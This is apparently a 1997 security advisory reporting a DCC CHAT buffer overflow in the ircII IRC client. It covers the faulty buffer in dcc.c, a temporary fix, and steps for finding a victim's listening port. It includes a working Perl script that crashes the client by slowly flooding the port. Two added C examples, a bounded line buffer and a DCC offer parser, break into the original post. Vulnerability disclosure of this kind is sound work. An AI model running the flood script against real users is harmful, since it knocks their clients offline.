(no subject)

super@POOL69.CE.NET
Sat, 21 Jun 1997 11:17:32 -0400

There seems to be a small buffer overflow in the UNIX irc client ircII.
This can't be used to gain unauthorized privileges since the program isn't set uid
or gid, but can be a denial of service attack, and can cause some interesting
problems on certain systems. By connecting to a listening DCC (Direct Client
Connection) CHAT port, and flooding slowly with a single character, the irc
client will crash (Segmentation Fault). This was tested on ircii-2.9alpha6,
but the bug should still be exploitable in earlier versions (like 2.8.2)
because the NEWS file in the root directory reveals no changes to the way the
client handles incoming DCC CHATs. When I tested on BitchX by hand it
created a segfault, but the attached perl script doesn't spew trash fast
enough; it can cause other problems though.. BitchX complains with "DCC buffer
overrun. Data lost." ..When tested on a BitchX client on a Slackware
Linux box, the following happened:

Jun 21 01:44:10 oblivion inetd[2713]: /usr/sbin/nmbd: exit status 0x1
Jun 21 01:44:13 oblivion last message repeated 2 times
1:51am up 27 days, 5:09, 3 users, load average: 1.14, 1.09, 0.68

Notice the high load average.. the only processes on this 486DX4/100 with 16
megs of RAM were a few idle services, a few shells and the irc client.
When I used top to view the CPU usage, BitchX was the second most CPU-active
program (below top), which is too much for an irc client..
I hadn't the slightest idea what nmbd was, there was no manpage, and nothing
in /usr/doc .. but a grep search of inetd.conf turned up this:

netbios-ns dgram udp wait root /usr/sbin/nmbd nmbd

Those darned netbios services seem to be vulnerable to all sorts of things. ;)
The problem lies in the process_incoming_chat() function in dcc.c on line 1141.

char tmp[BIG_BUFFER_SIZE+1];

BIG_BUFFER_SIZE is only 2048 bytes.. it is #define'd in irc.h, lines 120
and 121:

#define IRCD_BUFFER_SIZE 1024
#define BIG_BUFFER_SIZE (IRCD_BUFFER_SIZE * 2)

A temporary fix if absolutely needed would be to #define BIG_BUFFER_SIZE in
irc.h to something larger and recompile.
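Enlarging the buffer only moves the limit; the lasting fix is to never append past it. The following is an added example (not ircII or BitchX code) of how a DCC CHAT line-assembly routine can keep the same 2048-byte buffer and the same BIG_BUFFER_SIZE definitions from irc.h, but discard an overlong line instead of overrunning tmp[] (the "DCC buffer overrun. Data lost." behaviour the post describes for BitchX). The struct, function names and the slow_flood_demo() replay of the single-character flood are assumptions made here for illustration.

```c
#include <stdio.h>
#include <string.h>

#define IRCD_BUFFER_SIZE 1024
#define BIG_BUFFER_SIZE (IRCD_BUFFER_SIZE * 2)

/* Hypothetical per-connection state: the same size buffer ircII uses for a
 * DCC CHAT line, plus a fill count, an "in overlong line" flag and a counter. */
struct dcc_chat {
    char line[BIG_BUFFER_SIZE + 1]; /* assembled line, NUL-terminated */
    size_t len;                     /* bytes currently held in line[] */
    int skipping;                   /* 1 while discarding the rest of a bad line */
    unsigned long overruns;         /* overlong lines dropped so far */
};

typedef void (*line_cb)(const char *line, size_t len, void *ctx);

void dcc_chat_init(struct dcc_chat *c) { memset(c, 0, sizeof *c); }

/* Feed a chunk read from the DCC socket. Bytes are appended until '\n'
 * completes a line, which is handed to cb. A line that would exceed
 * BIG_BUFFER_SIZE is dropped and the remainder skipped up to the next '\n',
 * so no write ever goes past line[BIG_BUFFER_SIZE]. Returns the number of
 * complete lines delivered from this chunk. */
size_t dcc_chat_feed(struct dcc_chat *c, const char *data, size_t n,
                     line_cb cb, void *ctx)
{
    size_t delivered = 0;
    for (size_t i = 0; i < n; i++) {
        char ch = data[i];
        if (c->skipping) {
            if (ch == '\n') c->skipping = 0;   /* bad line ends here */
            continue;
        }
        if (ch == '\n') {
            c->line[c->len] = '\0';
            cb(c->line, c->len, ctx);
            delivered++;
            c->len = 0;
            continue;
        }
        if (c->len >= BIG_BUFFER_SIZE) {
            /* next byte would not fit: drop the partial line, don't overflow */
            c->overruns++;
            c->len = 0;
            c->skipping = 1;
            continue;
        }
        c->line[c->len++] = ch;
    }
    return delivered;
}

/* Test hook: remembers the last complete line delivered. */
static char last_line[BIG_BUFFER_SIZE + 1];
static void remember_line(const char *line, size_t len, void *ctx)
{
    (void)ctx;
    memcpy(last_line, line, len + 1);
}

/* Replays the flood from the post: 3000 bytes of 'a' sent one at a time
 * with no newline, followed by a normal line. Returns lines delivered and
 * reports how many overlong lines were discarded. */
size_t slow_flood_demo(unsigned long *overruns)
{
    struct dcc_chat c;
    size_t lines = 0;
    dcc_chat_init(&c);
    for (int i = 0; i < 3000; i++)
        lines += dcc_chat_feed(&c, "a", 1, remember_line, NULL);
    lines += dcc_chat_feed(&c, "\nhello\n", 7, remember_line, NULL);
    *overruns = c.overruns;
    return lines;
}

int main(void)
{
    unsigned long ov = 0;
    size_t lines = slow_flood_demo(&ov);
    printf("lines delivered: %zu, overruns dropped: %lu, last line: \"%s\"\n",
           lines, ov, last_line);
    return 0;
}
```

The flood of 3000 single bytes fills the 2048-byte buffer and is then discarded up to the next newline, so the client neither crashes nor spends memory on it, and the following "hello" line is still delivered intact.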

To exploit this you'll need to know the port the client is listening on. You
can find it by using ircII and reading raw_irc messages with: /on ^raw_irc "*" echo $0-
When a DCC CHAT is issued from a user it will look something like this:

PRIVMSG Lamer :^ADCC CHAT chat 3479866442 1533^A

The first set of numbers is the decimal IP address, and the second is the
port.. these are the arguments the following perl script takes..
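A client (or a log filter watching raw_irc output) has to pull that decimal address and port out of the CTCP payload and sanity-check them before acting on the offer. The following is an added example, not ircII code, that extracts the text between the two ^A (0x01) bytes of the PRIVMSG shown above, parses the "DCC CHAT chat <ip> <port>" form, rejects an out-of-range port, and renders the decimal address as a dotted quad; the function and struct names are assumptions made here.

```c
#include <stdio.h>
#include <string.h>

struct dcc_offer {
    char ip[16];      /* dotted-quad form of the advertised address */
    unsigned port;    /* advertised listening port */
};

/* Copy the text between the first pair of ^A (0x01) bytes of an IRC line
 * into buf. Returns 1 on success, 0 if there is no complete CTCP or it
 * does not fit. */
int extract_ctcp(const char *line, char *buf, size_t bufsz)
{
    const char *start = strchr(line, '\001');
    if (!start) return 0;
    start++;
    const char *end = strchr(start, '\001');
    if (!end || (size_t)(end - start) >= bufsz) return 0;
    memcpy(buf, start, (size_t)(end - start));
    buf[end - start] = '\0';
    return 1;
}

/* Parse "DCC CHAT chat <decimal-ip> <port>". The address is the 32-bit IPv4
 * address written as one decimal number, as ircII sends it. Returns 1 and
 * fills out on success; 0 if the payload is not a DCC CHAT offer or the
 * values are out of range. */
int parse_dcc_chat(const char *ctcp, struct dcc_offer *out)
{
    char kind[16];
    unsigned long addr, port;
    if (sscanf(ctcp, "DCC CHAT %15s %lu %lu", kind, &addr, &port) != 3)
        return 0;
    if (strcmp(kind, "chat") != 0) return 0;
    if (addr > 0xFFFFFFFFUL || port == 0 || port > 65535) return 0;
    snprintf(out->ip, sizeof out->ip, "%lu.%lu.%lu.%lu",
             (addr >> 24) & 255, (addr >> 16) & 255,
             (addr >> 8) & 255, addr & 255);
    out->port = (unsigned)port;
    return 1;
}

int main(void)
{
    /* The PRIVMSG from the post, with ^A written as \001. */
    const char *raw = "PRIVMSG Lamer :\001DCC CHAT chat 3479866442 1533\001";
    char ctcp[128];
    struct dcc_offer o;
    if (extract_ctcp(raw, ctcp, sizeof ctcp) && parse_dcc_chat(ctcp, &o))
        printf("DCC CHAT offer from %s port %u\n", o.ip, o.port);
    else
        printf("not a valid DCC CHAT offer\n");
    return 0;
}
```

Run against the line from the post, this prints the offer as 207.106.140.74 port 1533. A client would normally also compare the advertised address against the address the PRIVMSG actually came from before opening the connection; that comparison is left out here since it needs connection state this example does not model.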

------------------------------ ircii-dcc.pl -------------------------------

#!/usr/local/bin/perl -w
# $Id: ircii-dcc.pl,v 1.1 1997/06/21 03:57:55 super Exp $
use strict;
use Socket;
if(!($ARGV[1])){print("usage: $0 host port","\n");exit;}
my $port = $ARGV[1]; my $proto = getprotobyname("tcp");
my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
my $infstr = "a";
while(1){
select(undef, undef, undef, rand);
send(SKT,$infstr,0) || die "send() $!";
}

------------------------------ ircii-dcc.pl ------------------------------

I wouldn't consider this a major security vulnerability unless I'm missing
something with the overflow... But DCC CHATs are being used more
frequently on irc as an alternative because of lag when chatting between
irc servers.

.--------------------------------.
| super@innu.org |
|--------------------------------|
| http://www.ce.net/users/super/ |
| Fight SPAM! www.cauce.org |
| S@IRC |
`--------------------------------'